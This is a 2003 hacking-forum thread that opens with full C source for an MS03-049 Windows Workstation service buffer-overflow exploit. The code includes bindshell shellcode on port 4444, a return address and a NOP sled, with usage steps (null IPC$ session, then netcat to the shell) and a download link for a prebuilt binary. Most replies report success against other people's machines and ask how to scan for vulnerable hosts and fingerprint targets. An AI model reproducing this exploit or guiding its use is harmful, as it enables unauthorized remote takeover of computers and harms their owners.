This wasn't posted yet, so here it is. The code only runs on XP. My ISP blocks NetBIOS so I haven't tested it yet, but I heard it works. Let me know if it works for you.
Greetz Double-=V=-
```c
/* ms03-049 by wirepair, pretty sweet find, although i can only get this to work on XP.
 * Win2k responds with like op rng error stating it doesn't know what the hell i'm
 * requesting. Eeye seemed to allude to the fact that 'only xp has these undocumented
 * api's or something, anyways sc is from oc.192's awesome rpc exploit.
 *
 * This is beta and the code is friggen disgusting. It was a hack job basically, but it
 * works and i've tested it on 2 XP no sp machines. I'll add the 'change bindshell port'
 * later. It shouldn't crash the box either, at least in my cases exitthread does the
 * trick. This code proves how little i know about crazy windows string stuff if you see
 * a bunch of crap that makes no sense like weird casting.
 *
 * Update: heh this crazy string crap is exactly why it wasn't working, after reviewing
 * packet dumps my strings became seriously malformed. Oh well learn something new every
 * day, Thanks again Dave. After playing with each SP, I have come to the conclusion that
 * xp sp1a and sp0 deal with unicode strings differently. I'm forced to use the
 * MultiByteToWideChar for SP0 to process my string (\x89 \x81) seem to change the single
 * byte to 2 bytes instead of a null and a byte. SP1 gladly takes my own unicode string
 * but will *not* accept the MultiByteToWide. I will investigate somehow trying to
 * remotely tell which service pack the remote victim is by trying to get it to respond
 * with a unicode string and somehow have it include a 89 or 81 character so i can see
 * the difference, then scan the buff and hope i can find any clues to which sp the
 * remote host is. If anyone has some other ideas please drop me a email
 * wirepair@sh0dan.org or wirepair@roguemail.net Thanks.
 *
 * Snag the exe: http://sh0dan.org/files/0349.exe if yer lazy
 *
 * Usage:
 *   C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
 *   C:\>0349 ip.ip.ip.ip 1
 *   open new cmd:
 *   C:\>nc ip.ip.ip.ip 4444
 *
 * Republish: www.SecurityLab.ru
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* NetAddAlternateComputerName is resolved at run time from netapi32.dll */
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
                       IN LPCWSTR AlternateName,
                       IN LPCWSTR DomainAccount OPTIONAL,
                       IN LPCWSTR DomainAccountPassword OPTIONAL,
                       IN ULONG Reserved);

int main(int argc, char **argv)
{
    char overwrite[2045] = "";
    char sc[] =
        "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
        "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
        "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
        "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
        "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
        "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
        "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
        "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
        "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
        "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
        "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
        "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
        "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
        "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
        "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
        "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
        "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
        "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
        "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
        "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
        "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
        "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
        "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
        "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
        "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
        "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
        "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
        "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
        "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
        "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
        "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
        "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
    char exp_buf[2045+4+16+501];
    char ip[30];
    LPWSTR ipl[60];
    DWORD jmpesp = 0x7518A747;
    LPWSTR unicodesp0[(2045+4+16+501)*2];
    char unicode[(2045+4+16+501)*2];
    int i = 0;
    int x = 0;
    int len = 0;
    HINSTANCE hinstLib;
    MYPROC ProcAddr;
    BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

    if (argc < 3) {
        fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n");
        fprintf(stderr, "Usage: %s <ip> <sp>\n", argv[0]);
        fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\""
                        "\nC:\\>0349 ip.ip.ip.ip 1 (or 0)\n"
                        "open new cmd:\n"
                        "C:\\>nc ip.ip.ip.ip 4444\n"
                        "If it doesn't hang the ip's invalid or it did not work\n");
        exit(1);
    }

    printf("Attacking: %s\n", argv[1]);
    _snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:)
    hinstLib = LoadLibrary("netapi32.dll");

    /* build the overlong AlternateName: filler, return address, nop sled, shellcode */
    memset(overwrite, 0x41, 2000);
    memset(overwrite+2000, 0x90, 44);
    memcpy(exp_buf, overwrite, 2044);
    memcpy(exp_buf+2044, &jmpesp, 4);
    memset(exp_buf+2048, 0x90, 16);
    memcpy(exp_buf+2064, sc, sizeof(sc));

    if (atoi(argv[2]) == 1) {
        /* SP1: widen each byte by hand (byte, 0x00) */
        memset(unicode, 0x00, sizeof(unicode));
        for (x = 0, i = 0; i < sizeof(unicode); x++, i += 2) {
            // roll my own; stupid multibytetosuck broke my string.
            unicode[i] = exp_buf[x];
            // my thanks goes to dave aitel for mentioning this to me.
        }
    } else {
        /* SP0: let the code page conversion do it */
        len = MultiByteToWideChar(CP_ACP, 0, exp_buf, sizeof(exp_buf),
                                  (unsigned short *)unicodesp0, sizeof(unicodesp0));
    }
    MultiByteToWideChar(CP_ACP, 0, ip, 30, (unsigned short *)ipl, 60);
    //fprintf(stderr, "%s", exp_buf);
    //return(0);
    //wprintf(L"\n%s",ipl);
    //len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicode,sizeof(unicode));

    if (hinstLib != NULL) {
        ProcAddr = (MYPROC) GetProcAddress(hinstLib, "NetAddAlternateComputerName");
        if (NULL != ProcAddr) {
            fRunTimeLinkSuccess = TRUE;
            printf("\nGetProcAddr: %x\n", *ProcAddr);
            printf("Sending exploit, you should be able to nc to the host\n");
            if (atoi(argv[2]) == 1) {
                (ProcAddr)((LPCWSTR)ipl, (const unsigned short *)unicode, NULL, NULL, 0);
            } else {
                (ProcAddr)((LPCWSTR)ipl, (const unsigned short *)unicodesp0, NULL, NULL, 0);
            }
        } else {
            printf("procaddr null\n");
        }
    }
    return 0;
}
```
Hmm, looks cool, I am about to test it, so I return with some results.
Regards, LiquidSilver.
xaph
Dec 1 2003, 01:32 PM
works great thx a lot!!!! RESPECT!!!
Tested on a WinXP SP1 machine!!!! nice job!!
liquidSilver
Dec 1 2003, 01:34 PM
...back, yes it worked first time I tried. Hmm.. Weird.
Ow, well, nice exploit - great!
Regards, LiquidSilver.
DJVASTVASTY2K
Dec 1 2003, 02:16 PM
Double-=V=-
Thanks 4 This Exp
Will Test And Let You Know
Best Regards
Adam
Vast Gsm Team
liquidSilver
Dec 1 2003, 03:13 PM
Hmm, I tried testing it on Win2k sys. Got an error.
Oh, well, it ain't for Win2k either. Just a little try-out anyway
Xenos
Dec 1 2003, 03:28 PM
Great Job dude, I'll check if it works perfectly.. Thanks again for everyone.
boshcash
Dec 1 2003, 04:17 PM
niiice, works perfectly
ducky
Dec 1 2003, 05:40 PM
wow !! thanks a lot m8..worked on my XP sp0 too....
Fletcher
Dec 1 2003, 05:42 PM
Thx for sharing! i will test it soon
yeyo
Dec 1 2003, 05:58 PM
Thanks man, lets give it a try
ducky
Dec 1 2003, 06:15 PM
Another Prob: this vuln got 3 ports... which one of them is used in this exploit?? Tried to find something but no success... so if anyone knows plz tell me
Cheerz
Droezel
Dec 1 2003, 06:26 PM
Works great!
passi
Dec 1 2003, 06:27 PM
does anybody know how to scan for vulnerable workstations?
greetz, passiw
low_rider
Dec 1 2003, 08:04 PM
thnx dude nice work
vnet576
Dec 1 2003, 08:25 PM
nice..hehe i like this one...gave root on my winxp machine!
hulk
Dec 1 2003, 09:14 PM
Yep it also gave me root on my xp machine good work
wlingard
Dec 1 2003, 10:22 PM
Yes this works fine on your local system/network... but please correct me somebody if I'm wrong... it doesn't work remotely.. doesn't here on my test network anyways.
//WL
WeeDMoNKeY
Dec 4 2003, 01:01 AM
nope dont think so, erm, or when i tried rather
extreme
Dec 4 2003, 02:03 AM
I apologise if someone already posted this, but I can't seem to find a good reliable scanner for this exploit.. If there is one at all. Or should I just use a port scanner and scan certain ports?
PSR
Dec 4 2003, 11:01 AM
well since we're a gr8 big good old family here just check this board for a scanner. search up at the top and u might b surprised cause u have ran into a xscan ms0349 plugin which a very good dude coded and actually works rather good.
k done my good deed for this year j/k
extreme
Dec 4 2003, 11:36 AM
Shit. This plugin seeks all vulnerable systems.. And this one works only for XP.. Is there a way to recognise if the system is XP or 2k????
liquidSilver
Dec 4 2003, 02:36 PM
Maybe a stupid question, but ehrrrmm.. Does it even work remote?
Basti
Dec 4 2003, 03:27 PM
same question here, if I can hack with that exploit like with this one for win2000..
doesn't work here yet
Action
Dec 4 2003, 06:27 PM
i have a problem, when i type C:\real>0349 *.*.*.* 0 Attacking: *.*.*.* procaddr null
i always get that, what does it mean
liquidSilver
Dec 4 2003, 07:33 PM
Action: It means that the target you are trying to attack runs Win2k and NOT WinXP!
....As far as I know.. I could be wrong.
Test24
Dec 4 2003, 10:40 PM
hello
can somebody tell us if there is a way to know the OS running on a remote machine and is there a way to hide it? thanks
Basti
Dec 4 2003, 11:51 PM
QUOTE (Test24 @ Dec 4 2003, 11:40 PM)
hello
can somebody tell us if there is a way to know the OS running on a remote machine and is there a way to hide it? thanks
e.g. scan with languard...
tolf
Dec 5 2003, 01:45 AM
QUOTE (wlingard @ Dec 1 2003, 10:22 PM)
Yes this works fine on your local system/network... but please correct me somebody if I'm wrong... it doesn't work remotely.. doesn't here on my test network anyways.
//WL
yep doesn't work remote but you can run it locally, then netcat to the target remotely & it will give a shell... Problem is getting it to run on the target machine..
Any thoughts on how to do this with normal user privs?
Double-=V=-
Dec 5 2003, 10:58 AM
QUOTE (Action @ Dec 4 2003, 06:27 PM)
i have a problem, when i type C:\real>0349 *.*.*.* 0 Attacking: *.*.*.* procaddr null
i always get that, what does it mean
Maybe you should READ
/* ms03-049 by wirepair, pretty sweet find, although i can only get this to work on XP. Win2k responds with like op rng error stating it doesn't know what the hell i'm requesting. Eeye seemed to elude to the fact that 'only xp has these undocumented api's or something,
(You can only run the code *from* winXp to winXp.)
This should work remotely, net use //ip/IPC$ 0349 ip 1
T-BoNe
Dec 5 2003, 09:21 PM
i tested with about 200 ip's. doesn't work ?
but if i test it local it works like a charm =p
Kynroxes
Dec 5 2003, 10:15 PM
w00w00 Double-=V=- u rox and own the world around ... I test it now, tks I mustn't compile the source ... u rulezzzzzz !!
Toilal
Dec 6 2003, 01:42 AM
Hi T-BoNe, i think i know you :x
It works !! but you need to run it on a lan because a null IPC session needs to be set by the exploit. And i think on windows XP, IPC is open only to the lan by default. Isn't it? Try to use the xscan plugin i've coded and posted a few days ago. If the ip doesn't appear vulnerable after the scan, then it really WON'T be exploitable.
Got about 25 boxes on a lan, really nice. If the exploit freezes, then the shell is probably open. If it doesn't freeze, then try the next computer.
Thx for the exploit !
extreme
Dec 6 2003, 01:50 AM
Wait a minute.. If I have a LAN set up here, I can exploit remote computers on the net? Or only the ones I am connected to via LAN??? 2nd question. Is there any successful version for Win2k?
thesource
Dec 6 2003, 02:22 AM
tried on my lan. got this:
C:\Documents and Settings\mike\Desktop>0349.exe 192.168.1.105 1 Attacking: 192.168.1.105 procaddr null
hmm what would yall suggest doing next. i tried telneting to it. but it didn't respond :/
Toilal
Dec 6 2003, 02:55 AM
QUOTE (extreme @ Dec 6 2003, 01:50 AM)
Wait a minute.. If I have a LAN set up here, I can exploit remote computers on the net? Or only the ones I am connected to via LAN???
You won't be able to exploit remote computer on the net.
boshcash
Dec 6 2003, 11:45 AM
guys it's not just a local exploit, it's a remote exploit !! don't blame the exploit, blame the ISPs that blocked port 139, port 445 and 135. i tried it on a network user and it worked, also worked on a remote user using the same ISP, because my ISP doesn't block ports from its users ..
Divx_dude
Dec 6 2003, 04:06 PM
Man this one ownz, i had 20 targets and 15 were successful
thanx a lot dude
mnemonix
Dec 6 2003, 06:49 PM
damn nice work .. it worked local and remote
credits to you ..
101
Dec 6 2003, 07:56 PM
hint/
WeeDMoNKeY
Dec 6 2003, 10:23 PM
ive tried it on so many computers, i got nothing, even with the open ports and everything, you guys sure this works remote?
maxxis
Dec 7 2003, 01:00 AM
I check 5IP and not works ;(
thesource
Dec 7 2003, 01:46 AM
is it supposed to connect after exploited? or do you have to telnet to it?
SLiM577
Dec 7 2003, 06:01 AM
Ermmm im having some trouble here.
QUOTE
C:\Documents and Settings\SLiM\Desktop>0349 1**.***.**.*** 0 Attacking: 12*.***.***.***
GetProcAddr: 71c59530 Sending exploit, you should be able to nc to the host
C:\Documents and Settings\SLiM\Desktop>
Then i try to Telnet into the remote host on port 4444
nothing =/ any suggestions on what I'm doing wrong.
)Oni(
Dec 7 2003, 06:18 AM
lol meeeeen i tried my first IP on the Net ... and what happens ? something ...
Sending exploit ... Ok
and then ... telnet port 4444
well
And at the remote host comes : Enter Your Password :
other question : must i try every IP with net use ???? or can i exploit all the IPs and hope that he gives me a connect
WeeDMoNKeY
Dec 7 2003, 08:12 AM
i see what i might have been doing wrong, ill take a gander, ive made an auto h4xxor bat thing that MIGHT work, if it does ill post the shit for ya fellas
z0mbi3
Dec 7 2003, 08:35 AM
make a null session then fire up the exploit... you'll see that it hangs since nothing happens... that's a good sign, then open a new command prompt then nc ip 4444 and voila
gr8 work....
WeeDMoNKeY
Dec 7 2003, 10:09 AM
make null sessions before we run the exploit on the machine? i thought it was the other way around? im cold and can't type.
djexplosion
Dec 7 2003, 01:30 PM
i tried it but i can't get it to work @ most of the targets the exploit doesn't hang. but xscan says they're vulnerable.
so i netcat to it and it doesn't connect. any help ?
SLiM577
Dec 7 2003, 09:00 PM
where is the plug in on x-focus site anyone got the name of the file?